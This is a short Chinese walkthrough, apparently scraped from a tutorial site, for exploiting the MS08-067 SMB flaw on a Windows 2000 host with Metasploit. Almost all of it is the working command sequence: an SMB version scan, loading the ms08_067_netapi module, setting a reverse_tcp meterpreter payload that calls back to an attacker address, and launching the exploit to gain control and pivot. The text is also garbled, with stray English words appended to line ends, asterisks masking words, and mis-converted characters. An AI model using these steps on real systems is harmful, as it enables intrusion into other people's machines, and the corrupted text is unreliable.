控制檯是較爲方便的操做接口,所以在命令行下輸入msfconsole命令進入控制檯windows
考慮到ms08-067是比較廣泛也是較容易上手的安全漏洞,所以拿它做練習api
首先進行掃描,肯定開放samba服務的主機安全
加載掃描模塊,use scanner/smb/versiontcp
設定掃描範圍,set rhosts 192.168.11.0/24ide
查找到192.168.11.2,操做系統爲windows 2000 操作系統
查詢相關資料,該版本存在ms08-067漏洞命令行
在控制檯中輸入search ms08_067,查詢目前加載的全部安全漏洞***模塊,接口
每一個模塊,根據***成功的可能性,有評價it
加載選定的***模塊,use windows/smb/ms08_067_netapiio
輸入show options,查看模塊涉及的參數
設定目標主機的地址,set rhost 192.168.11.2
查詢與***模塊有關的***代碼,search payload
一旦漏洞***成功,經過***代碼取得控制權或進行破壞
設定選定的***代碼,set payload windows/meterpreter/reverse_tcp
再次輸入show options,查看***代碼的相關參數
設定***主機的地址,set lhost 192.168.11.10 ,以便於傳回鏈接
輸入exploit發起***
可能一次不能取得成功,能夠多試幾回
成功後,返回meterpreter控制檯,取得對目標主機的控制權
控制檯提供了系統命令,能夠用於跳板***。